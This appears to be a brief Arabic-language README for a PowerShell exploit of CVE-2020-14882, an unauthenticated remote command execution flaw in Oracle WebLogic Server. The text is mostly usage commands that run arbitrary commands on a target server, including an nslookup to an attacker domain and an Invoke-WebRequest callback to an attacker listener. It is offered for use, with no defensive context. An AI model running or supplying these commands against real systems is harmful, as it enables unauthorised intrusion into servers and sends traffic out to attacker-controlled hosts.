
CVE-2020-14882 مُعاد كتابته بلغة PowerShell
يستغل هذا النص البرمجي PowerShell الثغرة CVE-2020-14882 لتحقيق تنفيذ الأوامر عن بعد دون مصادقة على إصدارات Oracle WebLogic Server:
.\exploit.ps1 -target 'http(s)://target:7001' -command 'your_command'
.\exploit.ps1 -target 'http(s)://target:7001' -command 'nslookup your_Domain'
.\exploit.ps1 -target 'http(s)://target:7001' -command 'powershell.exe -c Invoke-WebRequest -Uri http://your_listener'